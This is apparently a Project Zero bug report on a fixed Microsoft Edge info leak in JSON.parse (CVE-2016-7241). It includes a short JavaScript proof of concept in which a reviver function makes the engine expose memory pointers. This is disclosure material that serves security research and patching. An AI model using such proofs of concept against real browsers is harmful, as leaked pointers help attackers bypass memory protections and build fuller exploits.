952 - Microsoft Edge: Info Leak in JSON.parse - project-zero

Starred by 1 user

Status:	Fixed
Owner:	natashenka@google.com
Closed:	Nov 2016
Cc:	project-...@google.com
Finder-natashenka Deadline-90 CCProjectZeroMembers Severity-Moderate Vendor-Microsoft Product-Edge Reported-2016-Sep-22 CVE-2016-7241

Microsoft Edge: Info Leak in JSON.parse

Project Member Reported by natashenka@google.com, Sep 22 2016

Back to list

There is an info leak in JSON.parse. If this function is called with a reviver, and the reviver modifies the output object to contain a native array, the Walk function assumes that this array is a Var array, and writes pointers to it. These pointers can then be read out of the array by script.

A minimal PoC is as follows:

var once = false;
var a = 1;

function f(){
        if(!once){
		a = new Array(1, 2, 3);
		this[2] = a;
	}
        once = true;
	return {};

}


JSON.parse("[1, 2, [4, 5]]", f);

A full PoC is attached. When loaded in a browser, this PoC will delay pointers in an alert dialog.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

j.html
558 bytes View Download

Project Member Comment 1 by natashenka@google.com, Nov 10 2016

Labels: CVE-2016-7241
Status: Fixed

Project Member Comment 2 by natashenka@google.com, Dec 1 2016

Labels: -Restrict-View-Commit

Comment 3 Deleted

► Sign in to add a comment